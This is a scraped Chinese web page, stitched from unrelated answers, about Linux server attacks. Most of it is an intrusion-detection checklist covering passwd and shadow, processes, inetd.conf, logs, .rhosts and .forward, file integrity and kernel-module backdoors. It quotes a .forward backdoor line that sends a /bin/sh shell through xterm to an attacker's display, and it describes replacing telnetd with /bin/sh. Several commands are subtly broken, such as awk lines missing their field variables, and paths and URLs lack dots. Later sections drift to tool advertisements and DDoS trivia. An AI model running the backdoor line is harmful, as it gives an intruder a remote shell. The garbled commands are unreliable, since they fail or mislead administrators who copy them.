linux系统会不会受到攻击?,第1张

当然会,所谓重大的黑客案子,一般都是linux或unix服务器被攻击。

防火墙嘛,系统是自带的,当然,为了安全,也可以安装别的,但是一般情况下是没有必要的。

现在linux出了防火墙以外,还提供SELinux,基本上已经足够了。

对于linux来说,作为服务器一般都是只提供某一项服务,而不会同时提供多项服务。例如如果一台机器是做为邮件服务器的,那么它一般不会提供www服务。这是因为提供较少的服务,打开较少的端口,可以减少被攻击的危险。同时,对系统日志进行检查的时候也更为方便,日志会记录服务的状态,如果遭到攻击,可以检查出来,但是当多项服务并存的时候,日志会十分杂乱(没有进行有效设置的话)。

如果是有经验的管理员,可以尝试提供多项服务。

你这种问题很难回答的,只能给你简单答一下。

1、怎么入侵的

你的是服务器,架上internet上,大家都可以访问。服务器为了方便别人访问,总会开启一些服务如http, ftp, ssh等等。黑客可以利用服务本身的漏洞或者套取密码(暴力破解、字典破解各种方式)获取一个有效的可以登录的用户,如果正好是root用户被破解,那你的机器就完全被他控制了。

2、文件是怎么放进来的?

获取到用户后,可以利用wget,或者sftp,ftp等各种方式把文件传进来。

3、如何防御?

这个最难回答,防御比进攻难。

你说开启了iptables, selinux,但是你有好好设置吗?

关掉不必要的端口减少被攻击的可能性;

经常更新你的系统,新的软件漏洞更少;

各种服务程序不要用root用户运行,免得黑客轻易利用程序问题获取root权限;

还有很多其它方法,网络安全和黑客性质一样,你要知道怎么攻击别人,你就会防御了。

现在你最好是先把服务器下线,处理好后再上线,免得在处理过程中受黑客干扰。

1、检查系统密码文件

首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。

1

   

awk –F:’==0 {print }’ /etc/passwd

   

  

顺便再检查一下系统里有没有空口令帐户:

1

   

awk –F: ‘length()==0 {print }’ /etc/shadow

   

  

2、查看一下进程,看看有没有奇怪的进程

重点查看进程:ps –aef | grep inetd

inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息,尤其注意有没有以/xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。

接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetdconf文件,输入:cat /etc/inetdconf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换inxxx程序来创建一个后门,比如用/bin/sh 替换掉intelnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。

输入netstat –rn,查看本机的路由、网关设置是否正确。

输入 ifconfig –a,查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、rhosts和forward

这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:

find / -name “rhosts” –print

find / -name “forward” –print

在某用户的$HOME下,rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

看到这里如果想要深入的做安全加固服务以及安全部署

就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供。

Unix下在forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的forward可能设置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksysotherdom:00 –e /bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases) 注意这只是一种简单的变换 更为高级的能够从forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后)利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:

ln -s /var/mail/luser ~/forward

然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/forwardBACKUP中。

直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。

UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :

UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程,对于守护进程配置文件inetdconf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/intelnetd intelnetd

可以看到它所使用的文件是 /usr/sbin/intelnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rcd下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?

说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

Linux的应用越来越普遍,且绝大多数嵌入式系统都使用的是Linux系统。但近期,黑客对Linux服务器进行DDoS攻击的次数飙升,受DDoS攻击影响的有70多个国家,其中77%的攻击都发生在中国,最容易受攻击的国家还有法国和荷兰。黑客主要是利用CC 服务器来集中管理并执行DDoS攻击,Linux服务器便成了其主要的攻击目标。面对如此猖獗的黑客攻击,Linux服务器如何做好预防工作呢?部署先进的安全解决方案,并利用且更新现有的Linux发行版,可以有效防护Linux服务器免受黑客的攻击。

1、做好硬件保护措施 不论什么样的设备都是十分脆弱的--包括运行在各类Linux系统上的服务器和台式机,以及交换机、路由器、调制解调器、无线设备等。在嵌入式Linux系统上运行的物联网设备同样也十分容易受到攻击。原因是大多数情况下用户无法及时更新或重新配置带有漏洞的软件,尤其是在工作负载量大的关键服务器上,也无法更新不受制造商设备支持的旧版软件。 所以租用Linux服务器的企业必须了解并实施SELinux,及时更新软件和内核,并采用强大的密码政策,以抵抗此类漏洞的威胁。而Linux服务器也必须强化或改进系统的安全性。

2、了解攻击病毒类型 在近期频繁发生的网络攻击中,黑客并没有采用新的攻击方式。据了解,今年第二季度SYN DDoS, TCP DDoS 和HTTP DDoS攻击依然是最常见的攻击类型。 据报告显示,基于Linux和基于Windows的DDoS bots病毒的活跃性比例首次失衡。Linux bots 病毒成为 SYN-DDoS最具攻击力的工具。

3、系统安全配置与及时更新 Linux是一个安全性比较高的操作系统。只要经过合理的配置和封锁,Linux就能够抵御目前许多的漏洞和攻击。此外,聘请专业的网络安全专业人员和购买安全软件对其进行维护,做好安全防护措施。 除此之外,虚拟主机商-bluehost建议使用Linux的企业应该及时安装系统补丁,并对系统进行安全配置和强化,这样无关的服务和应用程序就不会在系统上运行或安装。这种方法将有助于企业建立入侵防御系统以及新一代防火墙,将网络攻击对系统的伤害降至最低,而且还能够限制黑客入侵系统或利用系统发起僵尸网络攻击。

Linux远程连接及工具推荐

1、telnet:是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。

2、一款电脑远程监控的工具,IIS7远程桌面管理是一款专业的远程桌面连接软件,无需安装。操作简单方便。完美的界面设计、强大的监控功能、稳定的系统平台,满足了用户实现远程桌面连接的需求。分组功能。

3、多线程高效工作体验你值得拥有;加强版远程管理支持,上传下载文件再也不是问题;更有多套主题随心换,终端也可以美美哒。

4、如果是命令行的直接用putty就可以,如果需要远程桌面,可以考虑VNC,相关的安装过程百度也有的http://jingyanbaiducom/article/6c67b1d6f1bac92786bb1e6dhtml。

5、一般用secureCRT 和 xshell吧,都是大差不差的,自己用用就知道了,非要问出一个所有人都说好的工具你才用么?没必要,每个工具都有人喜欢也有人不喜欢。

6、第四款:SecureCRT SecureCRT是一款支持SSH的终端仿真程序,简单来说就是在Windows下登录Unix或Linux服务器主机的软件,自带文件传输工具,可以方便地上传下载文件,调整界面风格,切换多窗口等。

如何远程判断服务器的操作系统

通过应用程序来判断,如开放了80,打开其网站的程序,故意输入错误,看返回的代码可以看出是使用的什么类型的WEB服务器,可以估计。等等……。

连接上相应的linux主机,进入到等待输入shell指令的linux命令行状态下。在linux命令行下输入shell指令:uname -a。最后,按下回车键执行shell指令,此时会看到当前系统是linux系统的打印。

直接通过联接端口根据其返回的信息来判操作系统 这种方法应该说是用得最多的一种方法,下面我们来看几个实例。如果机子开了80端口,我们可以telnet(当然如果有NC最好用NC,它可以不用盲打)它的80端口。

使用xshell怎么远程连接linux服务器

1、填写登录用户名在弹出的SSH用户身份验证窗口中填写密码,并点击确定。填写密码进行身份验证这样就成功连接Linux系统了,如图,可在光标处尽情的输入命令了。成功连接Linux系统最后重启该会话,这样屏幕就可以显示更多的内容。

2、xshell连接linux服务,用到的工具:xshell,步骤如下:打开xshell,点击新建。输入名称,端口号,然后点击用户身份验证,输入用户名和密码点击确定。选择已经建立的连接单击就可以登录到linux服务器。

3、步骤一:登录Linux服务器。打开Xshell,新建会话输入相应的主机名称和IP,登录Linux服务器。图1:登录Linux服务器 如果连接Linux失败的话,可以参考教程:Xshell如何远程连接Linux服务器。步骤二:查看lrzsz是否已经安装。

4、步骤一 打开Xshell软件。双击桌面上的Xshell软件快捷图标,就可以打开软件,打开的软件主界面如下图所示。图1:Xshell软件主界面 步骤二 执行新建命令。

Linux服务器是否被攻击怎么判断

很多时候我们会遇到服务器遭受 cc 或 syn 等攻击,如果发现自己的网站访问异常缓慢且流量异常。可以使用系统内置 netstat 命令 简单判断一下服务器是否被攻击。常用的 netstat 命令 该命令将显示所有活动的网络连接。

查看less /var/log/secure文件,查看ssh日志,看是否有非法用户大量尝试ssh;who命令,查看目前ssh到linux服务器的用户,是否是合法的;查看在linux服务器上部署的应用是否有漏洞,有的话很容易受到攻击。

CC攻击的ip都是真实的,分散的;CC攻击的数据包都是正常的数据包;CC攻击的请求都是有效请求,且无法拒绝;CC攻击的是网页,服务器可以连接,ping也没问题,但是网页就是访问不了。

更安全的登录服务器会大大削弱入侵者透过登录系统窜改日志 文件的能力。

Shellshock使用bash脚本来接入你的电脑。仅仅是这个,它就能在你的机器上运行程序、开启服务、以及接收文件。这个脚本主要影响到基于Unix的操作系统,所以Linux系统和Mac OS毫无疑问的中枪了。

linux查看中国卡吞吐量和中国卡流量用自带命令,iptraf查看。 1 命令行直接输入:iptraf(如果没有,使用yum install iptraf安装) 打开进入选择ip镜像。 选择监听测试的接口,所有接口。

linux下怎么判断登录到远程服务器是否登录成功

ping 的话可能会并网关屏蔽掉,ping 可以ping通就说明可以连外网;80 端口,有些需要认证的网络,比如 ChinaUnicom的 wifi,登录之前会把所有的 80 端口DNAT然后重定向到登录页面,导致误判。

服务器使用公钥对用户发来的加密字符串进行解密,得到的解密字符串如果与第一步中发送给客户端的随机字符串一样,那么判断为登录成功。

在我们日常管理与维护服务器个过程中,我们都需要使用远程连接工具,今天我们就一同来总结下Linux常用的安全远程连接工具-OpenSSH。远程登录协议telnet:是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。

ssh 用户名@IP地址 -p 端口号 如果连接成功的话会提示你输入远程服务器的密码。全部成功之后SSH就会显示远程服务器的提示符,这时候就说明连接成功了。密钥登录 每次登录SH都需要输入密码很麻烦,而且可能不太安全。

注意:以下操作基于centos 6以下。要远程登录ssh。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » linux系统会不会受到攻击?

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情